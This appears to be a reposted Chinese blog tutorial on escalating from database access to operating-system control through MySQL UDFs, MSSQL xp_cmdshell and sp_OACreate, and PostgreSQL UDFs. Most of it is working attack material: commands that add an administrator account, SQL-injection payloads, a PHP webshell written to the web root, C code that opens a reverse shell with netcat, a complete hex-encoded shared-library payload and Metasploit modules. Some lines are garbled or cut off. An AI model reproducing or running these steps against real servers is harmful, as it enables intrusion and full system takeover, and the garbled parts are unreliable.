数据库提权

最新推荐文章于 2025-07-08 21:41:30 发布
转载 最新推荐文章于 2025-07-08 21:41:30 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://note.youdao.com/noteshare?id=fe6dd24e2126c6a8d7d9daead8c5f69f&sub=450220F818F94A2E8F0FF6407D990A3C
文章标签:

#mysql #mssql #postgresql

本文介绍MySQL和MSSQL中的提权技术,包括通过UDF函数和扩展存储过程执行系统命令,实现从数据库权限到操作系统管理员权限的提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

01. Mysql提权

Mysql提权一
user defined function,用户定义函数,为用户提供了一种高效创建函数的方式攻击者编写调用系统cmd命令(linux下相当于调用shell命令)的udf.dll文件,并将udf.dll导出到指定目录下,攻击者创建一个指向udf.dll的自定义函数func,每次在数据库查询中执行func函数等价于在cmd命令中执行命令。
Windows2003:C:\windows
MySQL 5.1版本后:mysql安装目录\lib\plugin\目录下

在MySQL5.1以后的环境下只有将udf.dll文件导出到mysql安装目录\lib\plugin\目录下才能成功,但是很多时候mysql安装目录下并不存在lib目录,mysql文件操作也并不能直接创建目录,此时需要通过NTFS ADS流来创建目录。NTFS ADS全称为NTFS交换数据流(NTFS Alternate Data Streams),是NTFS文件系统的一个特性。NTFS文件系统中的每一个文件可以包括多个数据流,每个文件数据流的完整格式如下:

<filename>:<stream name>:<stream type>

<文件名>:<流名>:<流种类>
只有一个data流时,stream name通常可以省略,stream type也可以成为attribute type。我们通常看到的是文件的data流,其它数据流都处于隐藏状态。当attribute type为$INDEX_ALLOCATION 时,表明该该数据流的宿主是文件夹。所以可以通过 mysql 导出数据到directory_path:: $INDEX_ALLOCATION文件的方法来创建directory_path目录。

目标主机开启MySQL远程连接,并且攻击者已经获得MySQL数据库连接的用户名和密码信息,通过udf手工提权获得操作系统管理员权限。
创建临时表:
create table temp_udf(udf BLOB); BLOB全称为Binary Large Objects,即大型二进制对象将udf.dll二进制数据插入临时表temp_udf中, b i n a r y C o d e 为 u d f . t x t 文 件 中 复 制 的 内 容 。 i n s e r t i n t o t e m p u d f v a l u e s ( C O N V E R T ( binaryCode为udf.txt文件中复制的内容。 insert into temp_udf values (CONVERT( binaryCodeudf.txtinsertintotempudfvalues(CONVERT(binaryCode,CHAR));
将udf.dll导出到mysql安装目录下的lib/plugin/udf.dll文件中:
select udf from temp_udf into dumpfile “C:/mysql/mysql-5.1.40-win32/lib/plugin/udf.dll”

创建cmdshell函数
create function cmdshell returns string soname ‘udf.dll’
添加超级管理员
select cmdshell(‘net user udftester 123456 /add & net localgroup administrators udftester /add’)
查看命令执行结果:
select cmdshell(‘net localgroup administrators’)

Mysql提权二
已获取webshell权限,由于管理员安全策略设置,无法直接执行系统命令,udf提权能够将webshell权限提升为管理员权限。

  • 上传mysql udf提权脚本,填写数据库用户名密码信息连接数据库
  • 导出udf.dll到mysql安装目录
  • 创建mysql自定义函数
  • 利用函数执行命令

02.Mssql提权
xp_cmdshell扩展存储过程,可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。
由于xp_cmdshell 可以执行任何操作系统命令,所以一旦SQL Server管理员帐号(如sa)被攻破,那么攻击者就可以利用xp_cmdshell 在SQL Server中执行操作系统命令
利用语法:
exec master…xp_cmdshell “dos命令”

SQL Server 2000中默认是开启的
SQL Server 2005及以上版本中xp_cmdshell 默认是关闭的。
如果服务未开启,执行 xp_cmdshell 将会提示类似以下的内容:
消息 15281,级别 16,状态 1,过程 xp_cmdshell,第 1 行

SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程‘sys.xp_cmdshell’ 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 ‘xp_cmdshell’。
exec sp_configure ‘show advanced options’,1;reconfigure;exec sp_configure ‘xp_cmdshell’,1;reconfigure;

User;user_name();system_user用户
db_name():当前数据库的名字
host_name():主机名字
@@version:数据库版本
@@servername:服务器名称
@@language:当前所使用语言的名称
is_srvrolemember (‘sysadmin’) 判断用户是否属于管理员的组

只有sysadmin组的用户才能执行xp_cmdshell
and (select IS_SRVROLEMEMBER (‘sysadmin’))=1–

判断数据库中是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = ‘x’ and name = ‘xp_cmdshell’)

尝试通过xp_cmdshell执行命令:
;exec master…xp_cmdshell “net user name password /add“ –
启用xp_cmdshell:
;exec sp_configure ‘show advanced options’,1;reconfigure;exec sp_configure’xp_cmdshell’,1;reconfigure;–
;exec master…xp_cmdshell “ver”–

添加用户:
;exec master…xp_cmdshell “net user name password /add” –
添加用户到管理员组:
;exec master…xp_cmdshell “net localgroup administrators name /add”–

在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权。
打开组件:
exec sp_configure ‘show advancced options’, 1;
RECONFIGURE WITH OVERRIDE;
exec sp-configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;
exec sp_configure ‘show advanced options’, 0;
dbcc addextendedproc(“sp_OACreate”,“odsole70.dll”);

执行命令:
declare

文章目录

Postgresql Getshell

postgresql简介

PostgreSQL 是一个自由的对象-关系数据库服务器(数据库管理系统)

postgresql环境搭建

https://www.postgresql.org/download/linux/redhat/

postgresql版本:9.6

运行平台:centos7 x86_64

安装rpm repo:
yum install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

安装客户端:
yum install postgresql96

安装服务端:
yum install postgresql96-server

初始化数据库:
/usr/pgsql-9.6/bin/postgresql96-setup initdb

启动数据库:
systemctl enable postgresql-9.6
systemctl start postgresql-9.6

postgresql 默认不支持使用root启动,所以需要建立用户:

useradd postgres
passwd postgres

切换到数据库用户:

su postgres

进入数据库:

psql postgres

修改数据库的密码:

alter user postgres with password 'postgres';

在其他用户权限下使用账号密码登录系统:

psql -h 127.0.0.1 -U postgres -W

配置postgresql远程登录:

配置对数据库的访问权限
vim /var/lib/pgsql/9.6/data/pg_hba.conf

host    all             all             0.0.0.0/0              md5

将数据库服务器的监听模式修改为监听所有主机发出的连接请求
vim /var/lib/pgsql/9.6/data/postgresql.conf

#listen_addresses='localhost'

修改为:

listen_addresses='*'

postgresql数据库基本使用

\h  显示sql命令的帮助信息
\?  显示psql命令的帮助信息
\q  退出

\l              列出数据库
\d(\dt)         列出数据表、视图和序列
\du             列出数据库用户
\password user  更改指定用户密码
\c database     切换到指定数据库
\conninfo       显示当前连接信息
\ddp            列出默认权限
\dl             列出大对象,类似于 \lo_list
\dp             列出表的访问权限
\sf func        列出指定函数的定义

postgresql数据库获取系统信息

列出系统目录列表

select pg_ls_dir('/etc');

读取系统文件

创建数据表把读到的文件copy入表

select pg_read_file('postgresql.auto.conf', 0, 200);

drop table p;
create table p(t TEXT);
copy p from '/etc/passwd';
select * from p limit 1 offset 0;
drop table p;

利用postgresql大对象处理来读文件

select lo_import('/etc/passwd',12345678);

select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;

写文件到系统

创建数据表插入数据,把数据表中的内容copy入文件系统

drop table pwn;
create table pwn(t TEXT);
insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');
select * from pwn;
copy pwn(t) to '/var/www/html/exec/1.php'
drop table pwn;

copy (select '<?php phpinfo();?>') to '/var/www/html/exec/1.php';

利用大数据对象进行二进制文件写入

postgresql数据库执行系统命令

这里需要分片进行上传就是将文件分成小于等于2KB大小的hex再进行上传,但是在9.6版本中必须切割等于2KB的数据上传才会成功。

ERROR:  pg_largeobject entry for OID 2008, page 0 has invalid data field size 2378

首先创建一个OID作为写入的对象,然后通过0,1,2,3…分片上传但是对象都为12345最后导出到/tmp目录下,删除OID收尾。

SELECT lo_create(12345);
INSERT INTO pg_largeobject VALUES (12345, 0, decode('7f454c4...0000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 1, decode('0000000...0000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 2, decode('f604000...0000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 3, decode('0000000...7400', 'hex'));
SELECT lo_export(12345, '/tmp/test.so');
SELECT lo_unlink(12345);

postgresql命令执行

低版本的命令执行

可以直接调用/lib/libc.so.6或者是/lib64/libc.so.6

一般8.2以下的版本可以:

CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE C STRICT;
CREATE FUNCTION system(cstring) RcETURNS int AS '/lib64/libc.so.6', 'system' LANGUAGE C STRICT;

直接可以执行命令:
select system('id');

高版本的命令执行

当postgresql版本高于8.2存在安全机制无法调用系统libc.so.6所以需要自己利用UDF进行命令执行

ERROR:  incompatible library "xxx.so": missing magic block
HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.

查看postgresql支持的扩展语言:

select * from pg_language;

如果支持python perl就很简单和低版本一样直接创建调用。

当不存在其他扩展语言时,postgresql默认支持C,所以要自己传一个编译好的so库去创建可执行命令函数

#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

text *exec()
{
    system("nc -e /bin/bash vpsIPaddress 2333");
}

编译环境见文章头部这个需要在/usr/pgsql-9.6/include/server/目录下执行因为存在postgres.h头部调用的库

gcc hack.c -I`pg_config --includedir-server` -fPIC -shared -o udf.so
strip -sx udf.so        #缩减so文件大小
cat udf.so | xxd -ps | tr -d "\n"       //将文件hex后去除\n

接下来我们需要将udf.so文件分割成每2048字节的块,最后一个块的大小不满足2048字节不需要考虑.

为什么不能小于2048?

是因为在postgresql高版本处理中,如果块之间小于2048,默认会用0去填充让块达到2048字节所以上传的文件才会一直创建函数失败.

用python脚本去分割udf.so文件,2个16进制数是一个字节所以按照4096个16进制数分割:

#~/usr/bin/env python 2.7
#-*- coding:utf-8 -*-
import sys
from random import randint
number = randint(1000, 9999)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage:python " + sys.argv[0] + "inputfile"
        sys.exit()
    fileobj = open(sys.argv[1],'rb')
    i = 0
    t = -1
    s = ''
    for b in fileobj.read():
        i = i + 1
        s += b
        if i % 4096 == 0:
            t = t + 1
            print 'insert into pg_largeobject values ({number}, {block}, decode(\'{payload}\',\'hex\'));\n'\
                    .format(number=number, block=t, payload=s)
            s = ''
    fileobj.close()

PostgreSQL: Documentation: 8.0: Large Objects

分割完成后按照下文中的sql语句执行:

    1. 写入对象
    1. 创建文件
    1. 建立函数
    1. 执行命令
    1. 清理函数
- 1. 写入对象
SELECT lo_create(9023);

- 2. 创建文件
insert into pg_largeobject values (9023, 0, decode('7f454c4602010100000000000000000003003e0001000000000d0000000000004000000000000000e8210000000000000000000040003800070040001a00190001000000050000000000000000000000000000000000000000000000000000004c140000000000004c1400000000000000002000000000000100000006000000f81d000000000000f81d200000000000f81d200000000000d802000000000000e00200000000000000002000000000000200000006000000181e000000000000181e200000000000181e200000000000c001000000000000c00100000000000008000000000000000400000004000000c801000000000000c801000000000000c80100000000000024000000000000002400000000000000040000000000000050e5746404000000cc11000000000000cc11000000000000cc110000000000006c000000000000006c00000000000000040000000000000051e574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000052e5746404000000f81d000000000000f81d200000000000f81d200000000000080200000000000008020000000000000100000000000000040000001400000003000000474e550052705bc9352a28aa252e8edf0fbc5d4c32e634e800000000030000001a00000002000000070000008440030810890c99880c008dc84400001a0000002100000026000000325e541ea868be124245d5ec2e67541eaa5fbe12bae3927c5f4de3214aad229d32a1f45bd871581cb88df10e25681b32c60da6d4ead3ef0e6637d3ed339268fe000000000000000000000000000000000000000000000000000000000000000003000900580b0000000000000000000000000000de00000012000000000000000000000000000000000000000901000012000000000000000000000000000000000000001c00000020000000000000000000000000000000000000007601000012000000000000000000000000000000000000006f01000012000000000000000000000000000000000000003a0100001200000000000000000000000000000000000000d60000001200000000000000000000000000000000000000110100001200000000000000000000000000000000000000fb0000001200000000000000000000000000000000000000690100001200000000000000000000000000000000000000010000002000000000000000000000000000000000000000c500000010000000000000000000000000000000000000009800000012000000000000000000000000000000000000006301000012000000000000000000000000000000000000000101000012000000000000000000000000000000000000003f0100001200000000000000000000000000000000000000f500000012000000000000000000000000000000000000005d0100001200000000000000000000000000000000000000320100001200000000000000000000000000000000000000610000002000000000000000000000000000000000000000380000002000000000000000000000000000000000000000520000002200000000000000000000000000000000000000dd00000010000000000000000000000000000000000000002d0100001200000000000000000000000000000000000000e300000012000b00d20e0000000000000800000000000000bc00000012000b00850e0000000000004d000000000000008601000010001600d0202000000000000000000000000000b300000012000b007d0e0000000000000800000000000000ec00000012000b00da0e000000000000c3000000000000009901000010001700d82020000000000000000000000000005001000012000b003b1000000000000031010000000000001801000012000b009d0f00000000000008000000000000008300000012000b00ed0d00000000000030000000000000008d01000010001700d02020000000000000000000000000001000000012000900580b00000000000000000000000000002101000012000b00a50f0000000000008e000000000000007500000012000b00e50d00000000000008000000000000001600000012000c006c1100000000000000000000000000004701000012000b00331000000000000008000000000000009f00000012000b001d0e0000000000006000000000000000005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c61737365730050675f6d616769635f66756e6300746578745f7074725f746f5f636861725f707472006d616c6c6f63006368725f7074725f746f5f746578745f7074720070675f66696e666f5f7379735f657865630070675f6465746f6173745f646174756d0073797374656d0070667265650070675f66696e666f5f7379735f6576616c00706f70656e006667657473007265616c6c6f63007374726e6370790070636c6f73650070675f66696e666f5f7379735f62696e6576616c00666f726b00737973636f6e66006d6d617000776169747069640070675f66696e666f5f7379735f66696c657265616400666f70656e00667365656b006674656c6c0066636c6f7365006672656164006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e3500000000000200', 'hex'));

insert into pg_largeobject values (9023, 1, decode('0200000002000200020002000200020002000000000002000200020002000200020002000000000002000000020001000100010001000100010001000100010001000100010001000100010001000000010001007c0100001000000000000000751a6909000002009e01000000000000f81d2000000000000800000000000000b00d000000000000001e2000000000000800000000000000700d000000000000101e2000000000000800000000000000101e200000000000d81f20000000000006000000040000000000000000000000e01f200000000000060000000c0000000000000000000000e81f20000000000006000000150000000000000000000000f01f20000000000006000000160000000000000000000000f81f200000000000060000001700000000000000000000001820200000000000070000000200000000000000000000002020200000000000070000000300000000000000000000002820200000000000070000000500000000000000000000003020200000000000070000000600000000000000000000003820200000000000070000000700000000000000000000004020200000000000070000000800000000000000000000004820200000000000070000000900000000000000000000005020200000000000070000000a00000000000000000000005820200000000000070000002200000000000000000000006020200000000000070000000b00000000000000000000006820200000000000070000000c00000000000000000000007020200000000000070000000d00000000000000000000007820200000000000070000000e00000000000000000000008020200000000000070000000f0000000000000000000000882020000000000007000000100000000000000000000000902020000000000007000000110000000000000000000000982020000000000007000000120000000000000000000000a02020000000000007000000130000000000000000000000a82020000000000007000000140000000000000000000000b02020000000000007000000170000000000000000000000b82020000000000007000000180000000000000000000000c02020000000000007000000190000000000000000000000c820200000000000070000002900000000000000000000004883ec08488b057d1420004885c07405e8c30000004883c408c30000000000000000000000000000ff3582142000ff25841420000f1f4000ff25821420006800000000e9e0ffffffff257a1420006801000000e9d0ffffffff25721420006802000000e9c0ffffffff256a1420006803000000e9b0ffffffff25621420006804000000e9a0ffffffff255a1420006805000000e990ffffffff25521420006806000000e980ffffffff254a1420006807000000e970ffffffff25421420006808000000e960ffffffff253a1420006809000000e950ffffffff2532142000680a000000e940ffffffff252a142000680b000000e930ffffffff2522142000680c000000e920ffffffff251a142000680d000000e910ffffffff2512142000680e000000e900ffffffff250a142000680f000000e9f0feffffff25021420006810000000e9e0feffffff25fa1320006811000000e9d0feffffff25f21320006812000000e9c0feffffff25ea1320006813000000e9b0feffffff25e21320006814000000e9a0feffffff25da1320006815000000e990feffffff25d21320006816000000e980feffff488d05d0132000488d3dc2132000554829f84889e54883f80e77025dc3488b05b41220004885c074f25dffe00f1f4000488d0599132000488d3d92132000554829f84889e548c1f8034889c248c1ea3f4801d048d1f875025dc3488b158f1220004885d274f25d4889c6ffe20f1f4000803d5913200000752748833d7712200000554889e5740c488d3d82102000e82dffffffe868ffffff5dc6053013200001f3c30f1f4000662e0f1f84000000000048833d50102000007426488b05271220004885c0741a55488d3d3a1020004889e5ffd05de957ffffff0f1f8000000000e94bffffff488d05c4030000c355534889fb508b17c1ea028d6afc8d7d014863ffe84afeffff4863d5488d73044889c74889d1f3a4c60410005a5b5dc341544983ccff4c89e15531ed4088e8534889fbf2ae48f7d1488d7903e812feffff4889df4889c24c89e14088e84889def2ae4889df48f7d18d048d0c0000004c89e189024088e8f2ae488d420448f7d14c01e14889c74889d0f3a45b5d415cc3488d0528030000c341554154554889fd5351488b7f20e8a8fdffff4889c74889c3e86dfdffff4989c44889c7e832fdffff4c89e74189c5e8d7fcffff483b5d2074084889dfe809feffff5a5b5d415c4489e8415dc3488d05cf020000c34157415641554154555352488b7f20e852fdffff4889c7e81afdffffbf000400004889c5e84dfdffffbf010000004989c4e840fdffff488d35690200004889efc600004889c331ede869fdffff4989c54c89eabe080000004c89e7e8c6fcffff4885c0743931c04c89e74883c9fff2ae4889df48f7d14c8d71ff468d7c35004963f7e80ffdffff488d3c284963d64c89e64889c34963efe82afcffffebb24c89efe870fcffff803b007405c6442bff00584889df5b5d415c415d415e415fe953fdffff488d0500020000c341545553488b7f20e88efcffff4989c48b28e824fdffff85c07907b801000000eb677555c1ed02bf1e000000e8dafcffff83ed04488d70ff4531c94863ed4531c031ff488d042e48f7d6b921000000ba070000004821c6e8cffbff', 'hex'));

insert into pg_largeobject values (9023, 2, decode('ff4883f8ff4889c374b6498d7424044889ea4889c7e886fbffffffd3eb0eba0100000031f689c7e854fcffff31c05b5d415cc3488d0566010000c341574989ff41564155415455534883ec28488b7f20e8ebfbffff488d7c240f488d3524010000b911000000f3a44889c7e8a0fbffff488d350b0100004889c74989c4e81efcffff4885c04889c3744431f6ba020000004889c7e8c7fbffff4889dfe87ffbffff31d231f64889c54889df4189c5e8adfbffff8d7d014863ffe892fbffff4885c04989c675144889dfe8f2faffff41c6471c0131c0e9830000004889d9ba010000004863f54889c7e8c3faffff4889dfe8cbfaffff8d7c2d014863ffe84ffbffff31d24889c34139d58d04127e23418a041688c183e00fc0e9048a44040f83e10f8a4c0c0f88445301880c5348ffc2ebd548984889dfc6040300e8b1fbffff4889df4889c5e846faffff4c89f7e83efaffff4c89e7e836faffff4889e84883c4285b5d415c415d415e415fc34883ec084883c408c300000000000000000000007200726200303132333435363738394142434445460000000000000000000000010000000100000001000000010000001c0000008a0300006400000020000000400000000100000001000000011b033b680000000c000000b4f9ffff8400000019fcffffac00000021fcffffc400000051fcffffec000000b1fcffff1c010000b9fcffff3401000006fdffff6c0100000efdffff84010000d1fdffffcc010000d9fdffffe401000067feffff140200006ffeffff2c0200001400000000000000017a5200017810011b0c070890010000240000001c00000028f9ffff80010000000e10460e184a0f0b770880003f1a3b2a33242200000000140000004400000065fbffff080000000000000000000000240000005c00000055fbffff3000000000410e108602410e188303440e20670e18410e10410e08002c000000840000005dfbffff6000000000420e108c02480e188603460e208304024c0e18410e10420e0800000000000014000000b40000008dfbffff08000000000000000000000034000000cc0000007dfbffff4d00000000420e108d02420e188c03410e208604440e288305410e30790e28410e20410e18420e10450e0800140000000401000092fbffff080000000000000000000000440000001c01000082fbffffc300000000420e108f02420e188e03420e208d04420e288c05410e308606410e388307410e4002a60e38440e30410e28420e20420e18420e10420e081400000064010000fdfbffff0800000000000000000000002c0000007c010000edfbffff8e00000000420e108c02410e188603410e20830402860e18410e10420e0800000000000014000000ac0100004bfcffff0800000000000000000000004c000000c40100003bfcffff3101000000420e108f02450e188e03420e208d04420e288c05410e308606410e388307440e600315010e38410e30410e28420e20420e18420e10420e080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', 'hex'));

insert into pg_largeobject values (9023, 3, decode('00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b00d000000000000700d0000000000000000000000000000101e20000000000001000000000000007c010000000000000c00000000000000580b0000000000000d000000000000006c110000000000001900000000000000f81d2000000000001b0000000000000008000000000000001a00000000000000001e2000000000001c000000000000000800000000000000f5feff6f00000000f00100000000000005000000000000005006000000000000060000000000000060020000000000000a00000000000000aa010000000000000b00000000000000180000000000000003000000000000000020200000000000020000000000000028020000000000001400000000000000070000000000000017000000000000003009000000000000070000000000000070080000000000000800000000000000c00000000000000009000000000000001800000000000000feffff6f000000005008000000000000ffffff6f000000000100000000000000f0ffff6f00000000fa07000000000000f9ffff6f000000000300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', 'hex'));

insert into pg_largeobject values (9023, 4, decode('181e20000000000000000000000000000000000000000000960b000000000000a60b000000000000b60b000000000000c60b000000000000d60b000000000000e60b000000000000f60b000000000000060c000000000000160c000000000000260c000000000000360c000000000000460c000000000000560c000000000000660c000000000000760c000000000000860c000000000000960c000000000000a60c000000000000b60c000000000000c60c000000000000d60c000000000000e60c000000000000f60c0000000000004743433a2028474e552920342e382e3520323031353036323320285265642048617420342e382e352d31362900002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e646174612e72656c2e726f002e64796e616d6963002e676f74002e676f742e706c74002e627373002e636f6d6d656e74000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000070000000200000000000000c801000000000000c80100000000000024000000000000000000000000000000040000000000000000000000000000001e000000f6ffff6f0200000000000000f001000000000000f0010000000000006c00000000000000030000000000000008000000000000000000000000000000280000000b000000020000000000000060020000000000006002000000000000f0030000000000000400000002000000080000000000000018000000000000003000000003000000020000000000000050060000000000005006000000000000aa0100000000000000000000000000000100000000000000000000000000000038000000ffffff6f0200000000000000fa07000000000000fa07000000000000540000000000000003000000000000000200000000000000020000000000000045000000feffff6f02000000000000005008000000000000500800000000000020000000000000000400000001000000080000000000000000000000000000005400000004000000020000000000000070080000000000007008000000000000c0000000000000000300000000000000080000000000000018000000000000005e000000040000004200000000000000300900000000000030090000000000002802000000000000030000000a0000000800000000000000180000000000000068000000010000000600000000000000580b000000000000580b0000000000001a0000000000000000000000000000000400000000000000000000000000000063000000010000000600000000000000800b000000000000800b00000000000080010000000000000000000000000000100000000000000010000000000000006e000000010000000600000000000000000d000000000000000d0000000000006c04000000000000000000000000000010000000000000000000000000000000740000000100000006000000000000006c110000000000006c1100000000000009000000000000000000000000000000040000000000000000000000000000007a000000010000000200000000000000801100000000000080110000000000004c0000000000000000000000000000001000000000000000000000000000000082000000010000000200000000000000cc11000000000000cc110000000000006c00000000000000000000000000000004000000000000000000000000000000900000000100000002000000000000003812000000000000381200000000000014020000000000000000000000000000080000000000000000000000000000009a0000000e0000000300000000000000f81d200000000000f81d0000000000000800000000000000000000000000000008000000000000000000000000000000a60000000f0000000300000000000000001e200000000000001e0000000000000800000000000000000000000000000008000000000000000000000000000000b2000000010000000300000000000000081e200000000000081e0000000000000800000000000000000000000000000008000000000000000000000000000000b7000000010000000300000000000000101e200000000000101e0000000000000800000000000000000000000000000008000000000000000000000000000000c4000000060000000300000000000000181e200000000000181e000000000000c001000000000000040000000000000008000000000000001000000000000000cd000000010000000300000000000000d81f200000000000d81f0000000000002800000000000000000000000000000008000000000000000800000000000000d200000001000000030000000000000000202000000000000020000000000000d000000000000000000000000000000008000000000000000800000000000000db000000080000000300000000000000d020200000000000d0200000000000000800000000000000000000000000000001000000000000000000000000000000e00000000100000030000000000000000000000000000000', 'hex'));

insert into pg_largeobject values (9023, 5, decode('d0200000000000002d00000000000000000000000000000001000000000000000100000000000000010000000300000000000000000000000000000000000000fd20000000000000e900000000000000000000000000000001000000000000000000000000000000', 'hex'));

- 3. 建立函数
SELECT lo_export(9023, '/tmp/testeval.so');

CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/testeval.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

- 4. 执行命令
select sys_eval('id');

- 5. 清理函数
drop function sys_eval(text);


lo_create() 新建一个大型对象并返回该大型对象的oid

lo_export(oid loid, text filename)
将大对象loid的数据导出到一个服务器文件filename中,返回导出长度(整型)。

lo_unlink(oid loid)
删除一个地址为loid的大对象,返回整型 1-成功  -1 -失败。

lo_open(oid loid, integer open_mode)
打开一个地址为loid的大对象,为读写做准备,open_mode为打开类型: inv_write(写,值为131072)、inv_read(读,值为262144)或者inv_write|inv_read (读写,值为393216)。返回文件句柄fd(整型),若fd为负数,失败。

loread(integer fd, integer len)
读句柄fd当前位置开始的len大小的数据,返回数据内容(bytea类型)。

lowrite(integer fd, bytea buf)
在句柄fd当前位置开始将二进制数据buf写入大对象中,返回所写的长度(整型)。

lo_lseek(integer fd, integer offset, integer whence)
改变句柄fd当前的读写位置。whence是寻址方式,seek_set(值为0)从对象头开始,seek_cur(值为1)从当前读写位置开始,seek_end(值为2)从对象尾开始,offset是偏移尺寸。返回新的读写位置(整型),-1表示错误。
注:loread、lowrite会自动改变当前读写位置,所以若顺序读写,lo_lseek这个命令就没什么用。

lo_tell(integer fd)
返回句柄fd的当前位置(整型)

lo_truncate(integer fd, integer len)
截取句柄fd所打开的大对象长度为len大小。若len大于原来大对象的长度,会在大对象后缀一个'\0'字符。成功返回0,失败为负数。

lo_close(integer fd)
关闭句柄fd, 成功返回0,失败为负数。

以上函数涉及到df句柄的,必须在一个transaction内完成,也就是说句柄fd只在一个事务内有效,事务结束它自动关闭。

metasploit postgresql模块

use auxiliary/admin/postgres/postgres_readfile
use auxiliary/admin/postgres/postgres_sql
use auxiliary/scanner/postgres/postgres_dbname_flag_injection
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/postgres/postgres_version
use auxiliary/server/capture/postgresql
use exploit/linux/postgres/postgres_payload
use exploit/windows/postgres/postgres_payload

参考

postgresql数据库利用方式

